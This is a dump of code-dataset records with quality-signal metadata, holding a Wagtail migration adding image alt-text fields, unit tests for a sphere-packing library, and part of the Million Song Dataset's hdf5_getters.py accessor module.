hexsha
string
size
int64
ext
string
lang
string
max_stars_repo_path
string
max_stars_repo_name
string
max_stars_repo_head_hexsha
string
max_stars_repo_licenses
list
max_stars_count
int64
max_stars_repo_stars_event_min_datetime
string
max_stars_repo_stars_event_max_datetime
string
max_issues_repo_path
string
max_issues_repo_name
string
max_issues_repo_head_hexsha
string
max_issues_repo_licenses
list
max_issues_count
int64
max_issues_repo_issues_event_min_datetime
string
max_issues_repo_issues_event_max_datetime
string
max_forks_repo_path
string
max_forks_repo_name
string
max_forks_repo_head_hexsha
string
max_forks_repo_licenses
list
max_forks_count
int64
max_forks_repo_forks_event_min_datetime
string
max_forks_repo_forks_event_max_datetime
string
content
string
avg_line_length
float64
max_line_length
int64
alphanum_fraction
float64
qsc_code_num_words_quality_signal
int64
qsc_code_num_chars_quality_signal
float64
qsc_code_mean_word_length_quality_signal
float64
qsc_code_frac_words_unique_quality_signal
float64
qsc_code_frac_chars_top_2grams_quality_signal
float64
qsc_code_frac_chars_top_3grams_quality_signal
float64
qsc_code_frac_chars_top_4grams_quality_signal
float64
qsc_code_frac_chars_dupe_5grams_quality_signal
float64
qsc_code_frac_chars_dupe_6grams_quality_signal
float64
qsc_code_frac_chars_dupe_7grams_quality_signal
float64
qsc_code_frac_chars_dupe_8grams_quality_signal
float64
qsc_code_frac_chars_dupe_9grams_quality_signal
float64
qsc_code_frac_chars_dupe_10grams_quality_signal
float64
qsc_code_frac_chars_replacement_symbols_quality_signal
float64
qsc_code_frac_chars_digital_quality_signal
float64
qsc_code_frac_chars_whitespace_quality_signal
float64
qsc_code_size_file_byte_quality_signal
float64
qsc_code_num_lines_quality_signal
float64
qsc_code_num_chars_line_max_quality_signal
float64
qsc_code_num_chars_line_mean_quality_signal
float64
qsc_code_frac_chars_alphabet_quality_signal
float64
qsc_code_frac_chars_comments_quality_signal
float64
qsc_code_cate_xml_start_quality_signal
float64
qsc_code_frac_lines_dupe_lines_quality_signal
float64
qsc_code_cate_autogen_quality_signal
float64
qsc_code_frac_lines_long_string_quality_signal
float64
qsc_code_frac_chars_string_length_quality_signal
float64
qsc_code_frac_chars_long_word_length_quality_signal
float64
qsc_code_frac_lines_string_concat_quality_signal
float64
qsc_code_cate_encoded_data_quality_signal
float64
qsc_code_frac_chars_hex_words_quality_signal
float64
qsc_code_frac_lines_prompt_comments_quality_signal
float64
qsc_code_frac_lines_assert_quality_signal
float64
qsc_codepython_cate_ast_quality_signal
float64
qsc_codepython_frac_lines_func_ratio_quality_signal
float64
qsc_codepython_cate_var_zero_quality_signal
bool
qsc_codepython_frac_lines_pass_quality_signal
float64
qsc_codepython_frac_lines_import_quality_signal
float64
qsc_codepython_frac_lines_simplefunc_quality_signal
float64
qsc_codepython_score_lines_no_logic_quality_signal
float64
qsc_codepython_frac_lines_print_quality_signal
float64
qsc_code_num_words
int64
qsc_code_num_chars
int64
qsc_code_mean_word_length
int64
qsc_code_frac_words_unique
null
qsc_code_frac_chars_top_2grams
int64
qsc_code_frac_chars_top_3grams
int64
qsc_code_frac_chars_top_4grams
int64
qsc_code_frac_chars_dupe_5grams
int64
qsc_code_frac_chars_dupe_6grams
int64
qsc_code_frac_chars_dupe_7grams
int64
qsc_code_frac_chars_dupe_8grams
int64
qsc_code_frac_chars_dupe_9grams
int64
qsc_code_frac_chars_dupe_10grams
int64
qsc_code_frac_chars_replacement_symbols
int64
qsc_code_frac_chars_digital
int64
qsc_code_frac_chars_whitespace
int64
qsc_code_size_file_byte
int64
qsc_code_num_lines
int64
qsc_code_num_chars_line_max
int64
qsc_code_num_chars_line_mean
int64
qsc_code_frac_chars_alphabet
int64
qsc_code_frac_chars_comments
int64
qsc_code_cate_xml_start
int64
qsc_code_frac_lines_dupe_lines
int64
qsc_code_cate_autogen
int64
qsc_code_frac_lines_long_string
int64
qsc_code_frac_chars_string_length
int64
qsc_code_frac_chars_long_word_length
int64
qsc_code_frac_lines_string_concat
null
qsc_code_cate_encoded_data
int64
qsc_code_frac_chars_hex_words
int64
qsc_code_frac_lines_prompt_comments
int64
qsc_code_frac_lines_assert
int64
qsc_codepython_cate_ast
int64
qsc_codepython_frac_lines_func_ratio
int64
qsc_codepython_cate_var_zero
int64
qsc_codepython_frac_lines_pass
int64
qsc_codepython_frac_lines_import
int64
qsc_codepython_frac_lines_simplefunc
int64
qsc_codepython_score_lines_no_logic
int64
qsc_codepython_frac_lines_print
int64
effective
string
hits
int64
dd72b3252a902552979d222dd4a18002dd348923
4,969
py
Python
apps/wagtail/home/migrations/0040_auto_20210320_1241.py
aadrm/breakoutwagtail
cf4ce09153adf2b5e14f15ffbc82bda754d427b3
[ "MIT" ]
null
null
null
apps/wagtail/home/migrations/0040_auto_20210320_1241.py
aadrm/breakoutwagtail
cf4ce09153adf2b5e14f15ffbc82bda754d427b3
[ "MIT" ]
null
null
null
apps/wagtail/home/migrations/0040_auto_20210320_1241.py
aadrm/breakoutwagtail
cf4ce09153adf2b5e14f15ffbc82bda754d427b3
[ "MIT" ]
null
null
null
# Generated by Django 3.1.4 on 2021-03-20 12:41 from django.db import migrations, models import django.db.models.query import wagtail.core.blocks import wagtail.core.fields import wagtail.images.blocks class Migration(migrations.Migration): dependencies = [ ('home', '0039_auto_20210320_1138'), ] operations = [ migrations.AddField( model_name='booknowpage', name='header_image_alt_de', field=models.CharField(blank=True, max_length=128, null=True), ), migrations.AddField( model_name='booknowpage', name='header_image_alt_en', field=models.CharField(blank=True, max_length=128, null=True), ), migrations.AddField( model_name='booknowpage', name='seo_image_alt_de', field=models.CharField(blank=True, max_length=128, null=True), ), migrations.AddField( model_name='booknowpage', name='seo_image_alt_en', field=models.CharField(blank=True, max_length=128, null=True), ), migrations.AddField( model_name='couponspage', name='header_image_alt_de', field=models.CharField(blank=True, max_length=128, null=True), ), migrations.AddField( model_name='couponspage', name='header_image_alt_en', field=models.CharField(blank=True, max_length=128, null=True), ), migrations.AddField( model_name='couponspage', name='seo_image_alt_de', field=models.CharField(blank=True, max_length=128, null=True), ), migrations.AddField( model_name='couponspage', name='seo_image_alt_en', field=models.CharField(blank=True, max_length=128, null=True), ), migrations.AddField( model_name='homepage', name='header_image_alt_de', field=models.CharField(blank=True, max_length=128, null=True), ), migrations.AddField( model_name='homepage', name='header_image_alt_en', field=models.CharField(blank=True, max_length=128, null=True), ), migrations.AddField( model_name='homepage', name='seo_image_alt_de', field=models.CharField(blank=True, max_length=128, null=True), ), migrations.AddField( model_name='homepage', name='seo_image_alt_en', field=models.CharField(blank=True, max_length=128, null=True), ), migrations.AddField( model_name='roompage', name='header_image_alt_de', field=models.CharField(blank=True, max_length=128, null=True), ), migrations.AddField( model_name='roompage', name='header_image_alt_en', field=models.CharField(blank=True, max_length=128, null=True), ), migrations.AddField( model_name='roompage', name='seo_image_alt_de', field=models.CharField(blank=True, max_length=128, null=True), ), migrations.AddField( model_name='roompage', name='seo_image_alt_en', field=models.CharField(blank=True, max_length=128, null=True), ), migrations.AlterField( model_name='homepage', name='reviews', field=wagtail.core.fields.StreamField([('review_family', wagtail.core.blocks.MultipleChoiceBlock(choices=django.db.models.query.QuerySet.values_list))], blank=True, null=True), ), migrations.AlterField( model_name='homepage', name='reviews_de', field=wagtail.core.fields.StreamField([('review_family', wagtail.core.blocks.MultipleChoiceBlock(choices=django.db.models.query.QuerySet.values_list))], blank=True, null=True), ), migrations.AlterField( model_name='homepage', name='reviews_en', field=wagtail.core.fields.StreamField([('review_family', wagtail.core.blocks.MultipleChoiceBlock(choices=django.db.models.query.QuerySet.values_list))], blank=True, null=True), ), migrations.AlterField( model_name='roompage', name='gallery', field=wagtail.core.fields.StreamField([('gallery', wagtail.core.blocks.StructBlock([('gallery', wagtail.core.blocks.ListBlock(wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock()), ('alt', wagtail.core.blocks.CharBlock())])))]))], blank=True, null=True), ), migrations.AlterField( model_name='roompage', name='reviews', field=wagtail.core.fields.StreamField([('review_family', wagtail.core.blocks.MultipleChoiceBlock(choices=django.db.models.query.QuerySet.values_list))], blank=True, null=True), ), ]
40.398374
298
0.610384
528
4,969
5.558712
0.128788
0.064395
0.122658
0.147189
0.856899
0.845656
0.845656
0.845656
0.845656
0.823509
0
0.021591
0.263635
4,969
122
299
40.729508
0.780541
0.009056
0
0.87069
1
0
0.124746
0.004673
0
0
0
0
0
1
0
false
0
0.043103
0
0.068966
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
8
dd7b2306b44d814d31e3c9556dc2277accbe1807
9,435
py
Python
particle_packing/tests/test_sphere.py
aluchies/particle_packing
127603a519ae25979de6c6197810a7ea38ec945b
[ "BSD-3-Clause" ]
null
null
null
particle_packing/tests/test_sphere.py
aluchies/particle_packing
127603a519ae25979de6c6197810a7ea38ec945b
[ "BSD-3-Clause" ]
null
null
null
particle_packing/tests/test_sphere.py
aluchies/particle_packing
127603a519ae25979de6c6197810a7ea38ec945b
[ "BSD-3-Clause" ]
null
null
null
from particle_packing import sphere import unittest import numpy as np from scipy.spatial.distance import pdist class TestCode(unittest.TestCase): """ pack.grid_md() """ def test1_pack_grid_md(self): """ Test case with zero points. """ x, y, z = sphere.pack.grid_md(npoints=0, radius=0.05) self.assertTrue(x.size == 0) self.assertTrue(y.size == 0) self.assertTrue(z.size == 0) def test2_pack_grid_md(self): """ Test case with default arguments. """ npoints = 5 radius = 0.05 x, y, z = sphere.pack.grid_md(npoints=npoints, radius=radius) self.assertTrue(x.size == npoints) self.assertTrue(y.size == npoints) self.assertTrue(z.size == npoints) def test3_pack_grid_md(self): """ Test case with npoints large """ npoints = 500 radius = 0.05 x, y, z = sphere.pack.grid_md(npoints=npoints, radius=radius) self.assertTrue(x.size == npoints) self.assertTrue(y.size == npoints) self.assertTrue(z.size == npoints) xyz = np.vstack([x, y, z]).transpose() d = pdist(xyz) self.assertTrue(d.min() > 2. * radius) def test4_pack_grid_md(self): """ Test case with npoints too large """ npoints = 1000 radius = 0.05 self.assertRaises(ValueError, sphere.pack.grid_md, npoints, 0.05) """ pack.metro_md() """ def test1_pack_metro_md(self): """ Test case with npoints small """ npoints = 5 radius = 0.05 step_limit = 10 ** 2 x, y, z = sphere.pack.grid_md(npoints=npoints, radius=radius) success_steps = sphere.pack.metro_md(x, y, z, radius, step_limit) for i in xrange(len(x)): self.assertTrue(x[i] > radius) self.assertTrue(x[i] < 1. - radius) self.assertTrue(y[i] > radius) self.assertTrue(y[i] < 1. - radius) self.assertTrue(z[i] > radius) self.assertTrue(z[i] < 1. - radius) xyz = np.vstack([x, y, z]).transpose() d = pdist(xyz) self.assertTrue(d.min() > 2. * radius) self.assertTrue(success_steps > 0) def test2_pack_metro_md(self): """ Test case with npoints small """ npoints = 500 radius = 0.05 step_limit = 10 ** 3 x, y, z = sphere.pack.grid_md(npoints=npoints, radius=radius) success_steps = sphere.pack.metro_md(x, y, z, radius, step_limit) for i in xrange(len(x)): self.assertTrue(x[i] > radius) self.assertTrue(x[i] < 1. - radius) self.assertTrue(y[i] > radius) self.assertTrue(y[i] < 1. - radius) self.assertTrue(z[i] > radius) self.assertTrue(z[i] < 1. - radius) xyz = np.vstack([x, y, z]).transpose() d = pdist(xyz) self.assertTrue(d.min() > 2. * radius) self.assertTrue(success_steps > 0) def test3_pack_metro_md(self): """ Test case random seed """ x0 = np.ascontiguousarray([0.1, 0.3, 0.5]) y0 = np.ascontiguousarray([0.1, 0.3, 0.5]) z0 = np.ascontiguousarray([0.1, 0.3, 0.5]) x1 = np.ascontiguousarray([0.1, 0.3, 0.5]) y1 = np.ascontiguousarray([0.1, 0.3, 0.5]) z1 = np.ascontiguousarray([0.1, 0.3, 0.5]) radius = 0.05 step_limit = 10 ** 3 randSeed = 100 success_steps0 = sphere.pack.metro_md(x0, y0, z0, radius, step_limit, randSeed) success_steps1 = sphere.pack.metro_md(x1, y1, z1, radius, step_limit, randSeed ) self.assertTrue(np.allclose(x0, x1)) self.assertTrue(np.allclose(y0, y1)) self.assertTrue(np.allclose(z0, z1)) def test4_pack_metro_md(self): """ Test case when all steps are successful """ npoints = 500 radius = 0.0 step_limit = 10 ** 3 x, y, z = sphere.pack.poisson_point(npoints=npoints) success_steps = sphere.pack.metro_md(x, y, z, radius, step_limit) self.assertTrue(success_steps == step_limit) """ pack.metro_pd() """ def test1_pack_metro_pd(self): """ Test case with npoints small """ npoints = 5 radius = 0.05 step_limit = 10 ** 2 x, y, z = sphere.pack.grid_md(npoints=npoints, radius=radius) radius = np.ascontiguousarray(0.05 * np.ones(npoints)) success_steps = sphere.pack.metro_pd(x, y, z, radius, step_limit) for i in xrange(len(x)): self.assertTrue(x[i] > radius[i]) self.assertTrue(x[i] < 1. - radius[i]) self.assertTrue(y[i] > radius[i]) self.assertTrue(y[i] < 1. - radius[i]) self.assertTrue(z[i] > radius[i]) self.assertTrue(z[i] < 1. - radius[i]) xyz = np.vstack([x, y, z]).transpose() d = pdist(xyz) self.assertTrue(d.min() > 2. * radius.min()) self.assertTrue(success_steps > 0) def test2_pack_metro_pd(self): """ Test case with npoints small """ npoints = 500 radius = 0.05 step_limit = 10 ** 3 x, y, z = sphere.pack.grid_md(npoints=npoints, radius=radius) radius = np.ascontiguousarray(0.05 * np.ones(npoints)) success_steps = sphere.pack.metro_pd(x, y, z, radius, step_limit) for i in xrange(len(x)): self.assertTrue(x[i] > radius[i]) self.assertTrue(x[i] < 1. - radius[i]) self.assertTrue(y[i] > radius[i]) self.assertTrue(y[i] < 1. - radius[i]) self.assertTrue(z[i] > radius[i]) self.assertTrue(z[i] < 1. - radius[i]) xyz = np.vstack([x, y, z]).transpose() d = pdist(xyz) self.assertTrue(d.min() > 2. * radius.min()) self.assertTrue(success_steps > 0) def test3_pack_metro_pd(self): """ Test case random seed """ x0 = np.ascontiguousarray([0.1, 0.3, 0.5]) y0 = np.ascontiguousarray([0.1, 0.3, 0.5]) z0 = np.ascontiguousarray([0.1, 0.3, 0.5]) x1 = np.ascontiguousarray([0.1, 0.3, 0.5]) y1 = np.ascontiguousarray([0.1, 0.3, 0.5]) z1 = np.ascontiguousarray([0.1, 0.3, 0.5]) radius = 0.05 step_limit = 10 ** 3 randSeed = 100 npoints = 3 radius = np.ascontiguousarray(0.05 * np.ones(npoints)) success_steps0 = sphere.pack.metro_pd(x0, y0, z0, radius, step_limit, randSeed) success_steps1 = sphere.pack.metro_pd(x1, y1, z1, radius, step_limit, randSeed ) self.assertTrue(np.allclose(x0, x1)) self.assertTrue(np.allclose(y0, y1)) self.assertTrue(np.allclose(z0, z1)) def test4_pack_metro_pd(self): """ Test case when all steps are successful """ npoints = 500 radius = 0.0 radius = np.ascontiguousarray(radius * np.ones(npoints)) step_limit = 10 ** 3 x, y, z = sphere.pack.poisson_point(npoints=npoints) success_steps = sphere.pack.metro_pd(x, y, z, radius, step_limit) self.assertTrue(success_steps == step_limit) """ pack.rsa_md() """ def test1_pack_rsa_md(self): """ Test case with npoints small """ npoints = 5 radius = 0.05 step_limit = 10 ** 2 x, y, z = sphere.pack.rsa_md(npoints, radius, step_limit) for i in xrange(len(x)): self.assertTrue(x[i] > radius) self.assertTrue(x[i] < 1. - radius) self.assertTrue(y[i] > radius) self.assertTrue(y[i] < 1. - radius) self.assertTrue(z[i] > radius) self.assertTrue(z[i] < 1. - radius) xyz = np.vstack([x, y, z]).transpose() d = pdist(xyz) self.assertTrue(d.min() > 2. * radius) self.assertTrue(npoints == len(x)) def test2_pack_rsa_md(self): """ Test case with npoints large """ npoints = 250 radius = 0.05 step_limit = 10 ** 4 x, y, z = sphere.pack.rsa_md(npoints, radius, step_limit) for i in xrange(len(x)): self.assertTrue(x[i] > radius) self.assertTrue(x[i] < 1. - radius) self.assertTrue(y[i] > radius) self.assertTrue(y[i] < 1. - radius) self.assertTrue(z[i] > radius) self.assertTrue(z[i] < 1. - radius) xyz = np.vstack([x, y, z]).transpose() d = pdist(xyz) self.assertTrue(d.min() > 2. * radius) self.assertTrue(npoints == len(x)) def test3_pack_rsa_md(self): """ Test case random seed """ npoints = 5 radius = 0.05 step_limit = 10 ** 3 randSeed = 100 x0, y0, z0 = sphere.pack.rsa_md(npoints, radius, step_limit, randSeed) x1, y1, z1 = sphere.pack.rsa_md(npoints, radius, step_limit, randSeed) self.assertTrue(np.allclose(x0, x1)) self.assertTrue(np.allclose(y0, y1)) self.assertTrue(np.allclose(z0, z1)) if __name__ == '__main__': print 'Running unit tests for sphere.so' unittest.main()
24.634465
77
0.540329
1,246
9,435
3.991172
0.081059
0.194249
0.104565
0.038608
0.898653
0.886588
0.869696
0.85924
0.826664
0.795898
0
0.046479
0.322735
9,435
383
78
24.634465
0.731768
0
0
0.80402
0
0
0.00469
0
0
0
0
0
0.351759
0
null
null
0
0.020101
null
null
0.005025
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
8
06be84476e42a86a0bf2ae266a2a3808b2343aaf
21,631
py
Python
hdf5_getters.py
greysou1/Million-Song-Dataset-HDF5-to-CSV
717270af89b37be8afe294160531d4104e49061c
[ "MIT" ]
null
null
null
hdf5_getters.py
greysou1/Million-Song-Dataset-HDF5-to-CSV
717270af89b37be8afe294160531d4104e49061c
[ "MIT" ]
null
null
null
hdf5_getters.py
greysou1/Million-Song-Dataset-HDF5-to-CSV
717270af89b37be8afe294160531d4104e49061c
[ "MIT" ]
null
null
null
""" Thierry Bertin-Mahieux (2010) Columbia University tb2332@columbia.edu This code contains a set of getters functions to access the fields from an HDF5 song file (regular file with one song or aggregate / summary file with many songs) This is part of the Million Song Dataset project from LabROSA (Columbia University) and The Echo Nest. Copyright 2010, Thierry Bertin-Mahieux This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. """ import numpy as np import h5py def open_h5_file_read(h5_file): """ loads the songs attributes from the metadata key """ return h5py.File(h5_file) # def get_song_id(songH5File): # return songH5File['metadata']['songs'][] def get_num_songs(h5): """ Return the number of songs contained in this h5 file, i.e. the number of rows for all basic informations like name, artist, ... """ return h5.root.metadata.songs.nrows def get_artist_familiarity(h5,songidx=0): """ Get artist familiarity from a HDF5 song file, by default the first song in it """ return h5['metadata']['songs']['artist_familiarity'][songidx] def get_artist_hotttnesss(h5,songidx=0): """ Get artist hotttnesss from a HDF5 song file, by default the first song in it """ return h5['metadata']['songs']['artist_hotttnesss'][songidx] def get_artist_id(h5,songidx=0): """ Get artist id from a HDF5 song file, by default the first song in it """ return h5['metadata']['songs']['artist_id'][songidx] def get_artist_mbid(h5,songidx=0): """ Get artist musibrainz id from a HDF5 song file, by default the first song in it """ return h5['metadata']['songs']['artist_mbid'][songidx] def get_artist_playmeid(h5,songidx=0): """ Get artist playme id from a HDF5 song file, by default the first song in it """ return h5['metadata']['songs']['artist_playmeid'][songidx] def get_artist_7digitalid(h5,songidx=0): """ Get artist 7digital id from a HDF5 song file, by default the first song in it """ return h5['metadata']['songs']['artist_7digitalid'][songidx] def get_artist_latitude(h5,songidx=0): """ Get artist latitude from a HDF5 song file, by default the first song in it """ return h5['metadata']['songs']['artist_latitude'][songidx] def get_artist_longitude(h5,songidx=0): """ Get artist longitude from a HDF5 song file, by default the first song in it """ return h5['metadata']['songs']['artist_longitude'][songidx] def get_artist_location(h5,songidx=0): """ Get artist location from a HDF5 song file, by default the first song in it """ return h5['metadata']['songs']['artist_location'][songidx] def get_artist_name(h5,songidx=0): """ Get artist name from a HDF5 song file, by default the first song in it """ return h5['metadata']['songs']['artist_name'][songidx] def get_release(h5,songidx=0): """ Get release from a HDF5 song file, by default the first song in it """ return h5['metadata']['songs']['release'][songidx] def get_release_7digitalid(h5,songidx=0): """ Get release 7digital id from a HDF5 song file, by default the first song in it """ return h5['metadata']['songs']['release_7digitalid'][songidx] def get_song_id(h5,songidx=0): """ Get song id from a HDF5 song file, by default the first song in it """ return h5['metadata']['songs']['song_id'][songidx] def get_song_hotttnesss(h5,songidx=0): """ Get song hotttnesss from a HDF5 song file, by default the first song in it """ return h5['metadata']['songs']['song_hotttnesss'][songidx] def get_title(h5,songidx=0): """ Get title from a HDF5 song file, by default the first song in it """ return h5['metadata']['songs']['title'][songidx] def get_track_7digitalid(h5,songidx=0): """ Get track 7digital id from a HDF5 song file, by default the first song in it """ return h5['metadata']['songs']['track_7digitalid'][songidx] def get_similar_artists(h5,songidx=0): """ Get similar artists array. Takes care of the proper indexing if we are in aggregate file. By default, return the array for the first song in the h5 file. To get a regular numpy ndarray, cast the result to: numpy.array( ) """ if h5.root.metadata.songs.nrows == songidx + 1: return h5.root.metadata.similar_artists[h5['metadata']['songs']['idx_similar_artists'][songidx]:] return h5.root.metadata.similar_artists[h5['metadata']['songs']['idx_similar_artists'][songidx]: h5['metadata']['songs']['idx_similar_artists'][songidx+1]] def get_artist_terms(h5,songidx=0): """ Get artist terms array. Takes care of the proper indexing if we are in aggregate file. By default, return the array for the first song in the h5 file. To get a regular numpy ndarray, cast the result to: numpy.array( ) """ if h5.root.metadata.songs.nrows == songidx + 1: return h5.root.metadata.artist_terms[h5['metadata']['songs']['idx_artist_terms'][songidx]:] return h5.root.metadata.artist_terms[h5['metadata']['songs']['idx_artist_terms'][songidx]: h5['metadata']['songs']['idx_artist_terms'][songidx+1]] def get_artist_terms_freq(h5,songidx=0): """ Get artist terms array frequencies. Takes care of the proper indexing if we are in aggregate file. By default, return the array for the first song in the h5 file. To get a regular numpy ndarray, cast the result to: numpy.array( ) """ if h5.root.metadata.songs.nrows == songidx + 1: return h5.root.metadata.artist_terms_freq[h5['metadata']['songs']['idx_artist_terms'][songidx]:] return h5.root.metadata.artist_terms_freq[h5['metadata']['songs']['idx_artist_terms'][songidx]: h5['metadata']['songs']['idx_artist_terms'][songidx+1]] def get_artist_terms_weight(h5,songidx=0): """ Get artist terms array frequencies. Takes care of the proper indexing if we are in aggregate file. By default, return the array for the first song in the h5 file. To get a regular numpy ndarray, cast the result to: numpy.array( ) """ if h5.root.metadata.songs.nrows == songidx + 1: return h5.root.metadata.artist_terms_weight[h5['metadata']['songs']['idx_artist_terms'][songidx]:] return h5.root.metadata.artist_terms_weight[h5['metadata']['songs']['idx_artist_terms'][songidx]: h5['metadata']['songs']['idx_artist_terms'][songidx+1]] def get_analysis_sample_rate(h5,songidx=0): """ Get analysis sample rate from a HDF5 song file, by default the first song in it """ return h5['analysis']['songs']['analysis_sample_rate'][songidx] def get_audio_md5(h5,songidx=0): """ Get audio MD5 from a HDF5 song file, by default the first song in it """ return h5['analysis']['songs']['audio_md5'][songidx] def get_danceability(h5,songidx=0): """ Get danceability from a HDF5 song file, by default the first song in it """ return h5['analysis']['songs']['danceability'][songidx] def get_duration(h5,songidx=0): """ Get duration from a HDF5 song file, by default the first song in it """ return h5['analysis']['songs']['duration'][songidx] def get_end_of_fade_in(h5,songidx=0): """ Get end of fade in from a HDF5 song file, by default the first song in it """ return h5['analysis']['songs']['end_of_fade_in'][songidx] def get_energy(h5,songidx=0): """ Get energy from a HDF5 song file, by default the first song in it """ return h5['analysis']['songs']['energy'][songidx] def get_key(h5,songidx=0): """ Get key from a HDF5 song file, by default the first song in it """ return h5['analysis']['songs']['key'][songidx] def get_key_confidence(h5,songidx=0): """ Get key confidence from a HDF5 song file, by default the first song in it """ return h5['analysis']['songs']['key_confidence'][songidx] def get_loudness(h5,songidx=0): """ Get loudness from a HDF5 song file, by default the first song in it """ return h5['analysis']['songs']['loudness'][songidx] def get_mode(h5,songidx=0): """ Get mode from a HDF5 song file, by default the first song in it """ return h5['analysis']['songs']['mode'][songidx] def get_mode_confidence(h5,songidx=0): """ Get mode confidence from a HDF5 song file, by default the first song in it """ return h5['analysis']['songs']['mode_confidence'][songidx] def get_start_of_fade_out(h5,songidx=0): """ Get start of fade out from a HDF5 song file, by default the first song in it """ return h5['analysis']['songs']['start_of_fade_out'][songidx] def get_tempo(h5,songidx=0): """ Get tempo from a HDF5 song file, by default the first song in it """ return h5['analysis']['songs']['tempo'][songidx] def get_time_signature(h5,songidx=0): """ Get signature from a HDF5 song file, by default the first song in it """ return h5['analysis']['songs']['time_signature'][songidx] def get_time_signature_confidence(h5,songidx=0): """ Get signature confidence from a HDF5 song file, by default the first song in it """ return h5['analysis']['songs']['time_signature_confidence'][songidx] def get_track_id(h5,songidx=0): """ Get track id from a HDF5 song file, by default the first song in it """ return h5['analysis']['songs']['track_id'][songidx] def get_segments_start(h5,songidx=0): """ Get segments start array. Takes care of the proper indexing if we are in aggregate file. By default, return the array for the first song in the h5 file. To get a regular numpy ndarray, cast the result to: numpy.array( ) """ if h5.root.analysis.songs.nrows == songidx + 1: return h5.root.analysis.segments_start[h5['analysis']['songs']['idx_segments_start'][songidx]:] return h5.root.analysis.segments_start[h5['analysis']['songs']['idx_segments_start'][songidx]: h5['analysis']['songs']['idx_segments_start'][songidx+1]] def get_segments_confidence(h5,songidx=0): """ Get segments confidence array. Takes care of the proper indexing if we are in aggregate file. By default, return the array for the first song in the h5 file. To get a regular numpy ndarray, cast the result to: numpy.array( ) """ if h5.root.analysis.songs.nrows == songidx + 1: return h5.root.analysis.segments_confidence[h5['analysis']['songs']['idx_segments_confidence'][songidx]:] return h5.root.analysis.segments_confidence[h5['analysis']['songs']['idx_segments_confidence'][songidx]: h5['analysis']['songs']['idx_segments_confidence'][songidx+1]] def get_segments_pitches(h5,songidx=0): """ Get segments pitches array. Takes care of the proper indexing if we are in aggregate file. By default, return the array for the first song in the h5 file. To get a regular numpy ndarray, cast the result to: numpy.array( ) """ if h5.root.analysis.songs.nrows == songidx + 1: return h5.root.analysis.segments_pitches[h5['analysis']['songs']['idx_segments_pitches'][songidx]:,:] return h5.root.analysis.segments_pitches[h5['analysis']['songs']['idx_segments_pitches'][songidx]: h5['analysis']['songs']['idx_segments_pitches'][songidx+1],:] def get_segments_timbre(h5,songidx=0): """ Get segments timbre array. Takes care of the proper indexing if we are in aggregate file. By default, return the array for the first song in the h5 file. To get a regular numpy ndarray, cast the result to: numpy.array( ) """ if h5.root.analysis.songs.nrows == songidx + 1: return h5.root.analysis.segments_timbre[h5['analysis']['songs']['idx_segments_timbre'][songidx]:,:] return h5.root.analysis.segments_timbre[h5['analysis']['songs']['idx_segments_timbre'][songidx]: h5['analysis']['songs']['idx_segments_timbre'][songidx+1],:] def get_segments_loudness_max(h5,songidx=0): """ Get segments loudness max array. Takes care of the proper indexing if we are in aggregate file. By default, return the array for the first song in the h5 file. To get a regular numpy ndarray, cast the result to: numpy.array( ) """ if h5.root.analysis.songs.nrows == songidx + 1: return h5.root.analysis.segments_loudness_max[h5['analysis']['songs']['idx_segments_loudness_max'][songidx]:] return h5.root.analysis.segments_loudness_max[h5['analysis']['songs']['idx_segments_loudness_max'][songidx]: h5['analysis']['songs']['idx_segments_loudness_max'][songidx+1]] def get_segments_loudness_max_time(h5,songidx=0): """ Get segments loudness max time array. Takes care of the proper indexing if we are in aggregate file. By default, return the array for the first song in the h5 file. To get a regular numpy ndarray, cast the result to: numpy.array( ) """ if h5.root.analysis.songs.nrows == songidx + 1: return h5.root.analysis.segments_loudness_max_time[h5['analysis']['songs']['idx_segments_loudness_max_time'][songidx]:] return h5.root.analysis.segments_loudness_max_time[h5['analysis']['songs']['idx_segments_loudness_max_time'][songidx]: h5['analysis']['songs']['idx_segments_loudness_max_time'][songidx+1]] def get_segments_loudness_start(h5,songidx=0): """ Get segments loudness start array. Takes care of the proper indexing if we are in aggregate file. By default, return the array for the first song in the h5 file. To get a regular numpy ndarray, cast the result to: numpy.array( ) """ if h5.root.analysis.songs.nrows == songidx + 1: return h5.root.analysis.segments_loudness_start[h5['analysis']['songs']['idx_segments_loudness_start'][songidx]:] return h5.root.analysis.segments_loudness_start[h5['analysis']['songs']['idx_segments_loudness_start'][songidx]: h5['analysis']['songs']['idx_segments_loudness_start'][songidx+1]] def get_sections_start(h5,songidx=0): """ Get sections start array. Takes care of the proper indexing if we are in aggregate file. By default, return the array for the first song in the h5 file. To get a regular numpy ndarray, cast the result to: numpy.array( ) """ if h5.root.analysis.songs.nrows == songidx + 1: return h5.root.analysis.sections_start[h5['analysis']['songs']['idx_sections_start'][songidx]:] return h5.root.analysis.sections_start[h5['analysis']['songs']['idx_sections_start'][songidx]: h5['analysis']['songs']['idx_sections_start'][songidx+1]] def get_sections_confidence(h5,songidx=0): """ Get sections confidence array. Takes care of the proper indexing if we are in aggregate file. By default, return the array for the first song in the h5 file. To get a regular numpy ndarray, cast the result to: numpy.array( ) """ if h5.root.analysis.songs.nrows == songidx + 1: return h5.root.analysis.sections_confidence[h5['analysis']['songs']['idx_sections_confidence'][songidx]:] return h5.root.analysis.sections_confidence[h5['analysis']['songs']['idx_sections_confidence'][songidx]: h5['analysis']['songs']['idx_sections_confidence'][songidx+1]] def get_beats_start(h5,songidx=0): """ Get beats start array. Takes care of the proper indexing if we are in aggregate file. By default, return the array for the first song in the h5 file. To get a regular numpy ndarray, cast the result to: numpy.array( ) """ if h5.root.analysis.songs.nrows == songidx + 1: return h5.root.analysis.beats_start[h5['analysis']['songs']['idx_beats_start'][songidx]:] return h5.root.analysis.beats_start[h5['analysis']['songs']['idx_beats_start'][songidx]: h5['analysis']['songs']['idx_beats_start'][songidx+1]] def get_beats_confidence(h5,songidx=0): """ Get beats confidence array. Takes 